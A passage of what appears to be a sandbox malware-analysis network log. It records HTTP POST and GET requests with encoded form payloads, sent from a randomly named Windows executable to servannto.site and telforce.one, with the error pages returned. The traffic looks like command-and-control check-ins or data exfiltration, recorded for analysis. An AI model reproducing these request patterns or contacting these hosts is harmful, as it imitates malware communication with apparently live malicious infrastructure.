30	192.168.2.4	49826	31.31.196.17	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:23:29.129539967 CET	828	OUT	POST /h26k/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.servannto.site Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: no-cache Origin: http://www.servannto.site Referer: http://www.servannto.site/h26k/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 36 44 4c 75 36 51 4d 4d 31 6a 61 6d 4c 38 52 4c 55 6e 48 65 52 4f 44 6f 4c 2b 77 37 64 6a 7a 49 56 4a 6d 51 44 58 74 48 78 77 71 70 6f 57 48 44 68 68 74 67 2f 2b 58 35 56 4d 45 49 4c 43 52 4b 45 35 37 41 55 73 52 4e 4c 50 74 66 76 38 64 68 43 59 4f 38 44 49 65 68 77 78 6f 37 55 59 61 65 4e 50 50 32 4b 59 61 44 73 7a 61 6a 4d 46 4d 66 75 55 61 65 73 57 47 57 72 57 38 7a 33 46 4f 53 31 57 35 66 72 75 31 41 43 63 78 55 71 33 7a 54 67 77 49 4e 67 79 4e 6f 4d 43 58 2b 7a 35 37 50 6b 49 44 44 74 7a 39 48 41 72 77 4d 6c 51 56 54 51 6f 69 4a 5a 56 6b 37 52 62 6e 32 43 49 31 34 34 59 59 30 42 50 49 6f 66 6c 73 47 72 41 45 46 2b 70 45 47 56 65 59 3d Data Ascii: R4qXin=6DLu6QMM1jamL8RLUnHeRODoL+w7djzIVJmQDXtHxwqpoWHDhhtg/+X5VMEILCRKE57AUsRNLPtfv8dhCYO8DIehwxo7UYaeNPP2KYaDszajMFMfuUaesWGWrW8z3FOS1W5fru1ACcxUq3zTgwINgyNoMCX+z57PkIDDtz9HArwMlQVTQoiJZVk7Rbn2CI144YY0BPIoflsGrAEF+pEGVeY=
Nov 15, 2024 04:23:30.043493032 CET	375	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 15 Nov 2024 03:23:29 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy\|zzyJ)[ J7F+[Sps#~x'$0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49827	31.31.196.17	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:23:31.678932905 CET	10910	OUT	POST /h26k/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.servannto.site Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Cache-Control: no-cache Origin: http://www.servannto.site Referer: http://www.servannto.site/h26k/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 36 44 4c 75 36 51 4d 4d 31 6a 61 6d 4c 38 52 4c 55 6e 48 65 52 4f 44 6f 4c 2b 77 37 64 6a 7a 49 56 4a 6d 51 44 58 74 48 78 78 2b 70 6f 6b 50 44 75 6d 42 67 34 2b 58 35 62 73 45 4e 4c 43 52 74 45 39 66 45 55 73 56 33 4c 4b 70 66 75 65 56 68 4b 4b 71 38 4e 49 65 68 2f 52 6f 36 51 59 62 65 4e 50 2f 71 4b 59 4b 44 73 7a 61 6a 4d 45 63 66 75 41 75 65 71 57 47 4a 6a 32 39 38 7a 46 50 4e 31 57 78 6c 72 75 77 31 43 73 52 55 72 58 6a 54 69 69 67 4e 34 69 4e 71 50 43 57 74 7a 35 6e 55 6b 49 50 68 74 7a 68 74 41 6f 73 4d 6d 30 46 4e 46 70 53 6d 59 54 6b 5a 48 37 6a 38 42 36 74 37 67 62 6f 75 45 2f 6b 53 63 6e 6f 76 6e 78 35 68 6a 38 45 64 44 37 59 4d 47 4f 35 58 6c 4e 34 57 52 56 46 4c 4e 56 39 39 7a 77 68 72 56 4f 71 77 33 59 71 37 33 46 33 64 6d 6e 79 2b 41 30 72 68 73 78 78 72 77 42 73 5a 33 57 58 58 54 58 58 65 4c 49 47 44 34 58 46 54 5a 38 4d 74 56 64 2b 2f 2f 44 46 63 6a 6e 7a 30 66 74 55 64 4d 2b 47 4c 73 4b 70 38 6e 4e 53 69 44 2f 52 38 6f 44 51 66 36 4a 37 51 2b 6b 63 4a 50 35 73 [TRUNCATED] Data Ascii: R4qXin=6DLu6QMM1jamL8RLUnHeRODoL+w7djzIVJmQDXtHxx+pokPDumBg4+X5bsENLCRtE9fEUsV3LKpfueVhKKq8NIeh/Ro6QYbeNP/qKYKDszajMEcfuAueqWGJj298zFPN1Wxlruw1CsRUrXjTiigN4iNqPCWtz5nUkIPhtzhtAosMm0FNFpSmYTkZH7j8B6t7gbouE/kScnovnx5hj8EdD7YMGO5XlN4WRVFLNV99zwhrVOqw3Yq73F3dmny+A0rhsxxrwBsZ3WXXTXXeLIGD4XFTZ8MtVd+//DFcjnz0ftUdM+GLsKp8nNSiD/R8oDQf6J7Q+kcJP5skine58Ng8WpC6nc3HecF7EORugMtSfStI3H1iCmQmIxx7Kh/BDIxBfll0MAaWEs/s/QVzRBJ4vlinxDByX4WcUfJX1RmUrhdvzZgZAH4cPIZzf/zf+UveSfR19jwjoxcGf2ZzytnxckggKYw7sGKvxSyguvJJ/NMjI4dpPv9RaaMq/adm+YaIxd4KFpf6Q6H+PJn27Uf5RS0tnhKTr6kP4AOfiav3q8uHomQ8kKixj/ChuO19dCKi5H9tT9OGxsCYH47f/3JbjrAOM/NnIC7e83iK7AkRPkgQN5icAurRL8z2nXc4/H5SBxRqvngUj+22Ez0ejBF8ZeiPpDSeH+rxWiT1YwYQCmD11vJL9Qfswul1cL0XBa+sYYER8mgmQxbs9vM0g8zcmLn58CeRBBbDYS7QMDzFMHcqErFOHWYYAGNlH9pg2ZCodUeMSeBtVdlhrBsJoGVNy7SVp5nejj/q3miNPpjqRtWvhWBunITDwg2SrDIlRWW4Rp+Aw01u1ChV3m/QeYRXBeZOGWw4e/vVzziatVP3Bhtc2PI9HiHDOi7zpbTjOjatMD5lFp6sQ7rKKgvC32YI4mVtl2Qcvpd4Y0TpFL9ac7Ire9MNpU8Tj8czt9qkptevpGHkh1dFEhABc+73org+WmRGo2pHGFXFdDlwB6Bz4n7k9 [TRUNCATED]
Nov 15, 2024 04:23:32.576594114 CET	375	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 15 Nov 2024 03:23:32 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy\|zzyJ)[ J7F+[Sps#~x'$0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49828	31.31.196.17	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:23:34.225163937 CET	544	OUT	GET /h26k/?R4qXin=3BjO5l4trS+mOtJJJG3yLOLYEPQxRCXXfOCWIFV4tkiUomDH7G5wxffcY7A/EhE+G/r5frF5I7R9nf11AZCcJ7681zBJff7eDJ/XOLmbyjnrIh14rmHejEU=&A69pk=_b0Tr07p9f0pn HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.servannto.site Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 15, 2024 04:23:35.106688976 CET	733	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 15 Nov 2024 03:23:34 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED] Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49829	64.190.63.222	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:23:40.597313881 CET	802	OUT	POST /ykhz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.telforce.one Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Cache-Control: no-cache Origin: http://www.telforce.one Referer: http://www.telforce.one/ykhz/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 54 6c 59 58 50 45 64 70 63 68 47 44 7a 4c 6f 51 6a 4d 4f 47 4e 58 52 37 41 78 32 79 49 44 31 42 30 7a 51 31 55 2b 67 6a 32 6a 36 33 4b 4c 70 43 45 2f 48 61 42 4b 6b 76 73 4c 73 36 51 62 33 51 35 6e 33 46 53 7a 6a 4b 72 44 70 2f 63 58 6e 65 6d 67 64 41 77 44 39 4c 2f 64 4c 49 47 79 47 2f 38 78 66 38 65 53 52 48 57 2f 4d 53 43 4c 4b 5a 79 49 44 51 4c 48 30 76 7a 6d 61 41 4e 63 42 67 38 6a 4d 4f 61 42 48 71 48 4e 51 4a 4c 41 64 77 51 41 37 72 77 57 55 50 36 2b 4f 58 31 46 71 34 74 43 2f 75 52 47 37 62 37 54 6b 79 2b 50 30 37 79 68 50 38 5a 5a 48 37 73 67 6b 71 6e 69 45 64 78 67 3d 3d Data Ascii: R4qXin=TlYXPEdpchGDzLoQjMOGNXR7Ax2yID1B0zQ1U+gj2j63KLpCE/HaBKkvsLs6Qb3Q5n3FSzjKrDp/cXnemgdAwD9L/dLIGyG/8xf8eSRHW/MSCLKZyIDQLH0vzmaANcBg8jMOaBHqHNQJLAdwQA7rwWUP6+OX1Fq4tC/uRG7b7Tky+P07yhP8ZZH7sgkqniEdxg==
Nov 15, 2024 04:23:41.410140991 CET	707	IN	HTTP/1.1 405 Not Allowed date: Fri, 15 Nov 2024 03:23:41 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49830	64.190.63.222	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:23:43.138101101 CET	822	OUT	POST /ykhz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.telforce.one Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Cache-Control: no-cache Origin: http://www.telforce.one Referer: http://www.telforce.one/ykhz/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 54 6c 59 58 50 45 64 70 63 68 47 44 79 72 34 51 76 50 6d 47 4d 33 52 34 50 52 32 79 64 7a 31 64 30 7a 63 31 55 2f 6b 7a 32 57 71 33 4b 75 56 43 48 36 7a 61 47 4b 6b 76 6e 72 74 77 64 37 33 68 35 6e 71 34 53 79 76 4b 72 44 56 2f 63 54 6a 65 6c 52 64 48 32 54 39 4a 71 74 4c 4b 4a 53 47 2f 38 78 66 38 65 53 31 68 57 37 6f 53 43 37 61 5a 7a 74 2f 54 58 58 30 6f 37 47 61 41 4a 63 42 61 38 6a 4d 57 61 46 48 41 48 50 6f 4a 4c 42 74 77 65 79 44 6f 35 57 55 56 2b 2b 50 49 6c 6e 6a 39 68 68 79 2f 4d 31 50 4c 36 42 73 46 79 70 35 68 6a 51 75 72 4c 5a 6a 49 78 6e 74 65 71 68 35 55 71 72 6e 35 69 49 75 53 69 50 42 37 2b 49 6a 4e 35 5a 54 30 34 4d 6f 3d Data Ascii: R4qXin=TlYXPEdpchGDyr4QvPmGM3R4PR2ydz1d0zc1U/kz2Wq3KuVCH6zaGKkvnrtwd73h5nq4SyvKrDV/cTjelRdH2T9JqtLKJSG/8xf8eS1hW7oSC7aZzt/TXX0o7GaAJcBa8jMWaFHAHPoJLBtweyDo5WUV++PIlnj9hhy/M1PL6BsFyp5hjQurLZjIxnteqh5Uqrn5iIuSiPB7+IjN5ZT04Mo=
Nov 15, 2024 04:23:44.004448891 CET	707	IN	HTTP/1.1 405 Not Allowed date: Fri, 15 Nov 2024 03:23:43 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49831	64.190.63.222	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 04:23:45.695161104 CET	10904	OUT	POST /ykhz/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.telforce.one Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Cache-Control: no-cache Origin: http://www.telforce.one Referer: http://www.telforce.one/ykhz/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 52 34 71 58 69 6e 3d 54 6c 59 58 50 45 64 70 63 68 47 44 79 72 34 51 76 50 6d 47 4d 33 52 34 50 52 32 79 64 7a 31 64 30 7a 63 31 55 2f 6b 7a 32 56 4b 33 4b 59 42 43 45 5a 62 61 48 4b 6b 76 75 4c 74 7a 64 37 33 47 35 6e 6a 2f 53 79 79 2f 72 47 52 2f 64 77 72 65 6b 6c 70 48 2f 54 39 4a 31 39 4c 4a 47 79 48 39 38 78 4f 55 65 53 6c 68 57 37 6f 53 43 39 65 5a 6c 49 44 54 48 6e 30 76 7a 6d 61 6c 4e 63 41 55 38 6e 6f 47 61 46 44 36 48 2b 49 4a 4b 69 46 77 63 48 76 6f 79 57 55 54 7a 65 50 41 6c 6e 2f 32 68 68 65 7a 4d 31 4c 68 36 44 77 46 69 2b 56 36 78 54 75 31 56 34 4c 4c 7a 55 64 66 74 68 30 55 6e 72 54 78 70 4b 7a 50 2f 75 46 4b 38 62 57 58 73 73 4c 56 6c 4a 77 4a 30 63 6b 4d 66 4c 4f 72 38 36 61 6c 35 57 38 6b 72 6f 44 47 52 50 6e 4f 62 4e 4e 33 6c 6a 63 4a 2f 64 61 7a 37 62 67 37 48 4c 58 2b 65 67 4f 73 47 79 76 74 4a 58 71 77 59 45 53 4d 6f 56 52 70 67 64 45 7a 43 68 4f 4c 44 6f 79 30 4f 79 6a 57 72 7a 4e 7a 50 6b 42 5a 6b 45 37 33 2b 53 42 76 73 74 41 70 6f 69 54 34 55 36 6c 72 54 78 4c 4a 6c 7a 6f [TRUNCATED] Data Ascii: R4qXin=TlYXPEdpchGDyr4QvPmGM3R4PR2ydz1d0zc1U/kz2VK3KYBCEZbaHKkvuLtzd73G5nj/Syy/rGR/dwreklpH/T9J19LJGyH98xOUeSlhW7oSC9eZlIDTHn0vzmalNcAU8noGaFD6H+IJKiFwcHvoyWUTzePAln/2hhezM1Lh6DwFi+V6xTu1V4LLzUdfth0UnrTxpKzP/uFK8bWXssLVlJwJ0ckMfLOr86al5W8kroDGRPnObNN3ljcJ/daz7bg7HLX+egOsGyvtJXqwYESMoVRpgdEzChOLDoy0OyjWrzNzPkBZkE73+SBvstApoiT4U6lrTxLJlzogbFAuPu7ss2re3P1fLKFwi3y28WQWGd1CvVRUIbT7RAUn7pEFuhi4mKWvvM8ntqKQOqTB6pdkgwSGj6P3/5IkbHWnTcI/H6yrE39HI/YJgSSIWQrKPhZJSVrVkm/IHfawEDWwzNWdQ+FRBzEpDhYVOSfeSDoFn2wEIHfuhBDe/ZyTCgn8Aof9/kpjG8kv9SW0c6M4EoCaPoyLrH0ro1KE1LTSBdkndz8K5tAeO/yufZ7RRSMmtgjhgvPS1Z4wp57sdMWGmn3ko6Qc24RiaJ/Fz/X1v05OrCRVQnZYcMqhQcy0i2eIEQr6MPuSE9iUzL9DbkoQwaqTlh+rKWWTuLz3RXE/mkmU8dqoI64qvY43WTq2Y5J3d43CPI3eeSwDpPdfRf2FsA0OSLj+5Kq3VM0w8x99BZCO1Xj37uPC49QqQmKnpgqx7hTg7zwAEsLPL/NXcMX9asq8FNu9oZZ3+kvkn2tQT1XYsGYwX69shbux5ApodaA3AuW4xywocH1Hxt0sPNii4qbxLRhzD92cbuVcLN86QEwnSn9BBF6bqox3uu22bEF3vwk10vJ8vGMCnygVZ/2zRPTbxoeT7RSEVXGoMvXkQHJeIF3IRgBlaiNTNd5atL/07ZJHF5qxLrqdueZKZgSZ+vzA3V8w2THxj3AoT9yOJTE6+Q9le [TRUNCATED]
Nov 15, 2024 04:23:46.536565065 CET	707	IN	HTTP/1.1 405 Not Allowed date: Fri, 15 Nov 2024 03:23:46 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49832	64.190.63.222	80	3084	C:\Program Files (x86)\JAgDGgGmJoGiOaiuMuPFeHtKWrtIzyHOmXZdkmcPoszQteYuraTuHqfoDcYrOuqGY\qWxlULNrWdo.exe

Timestamp	Bytes transferred	Direction	Data
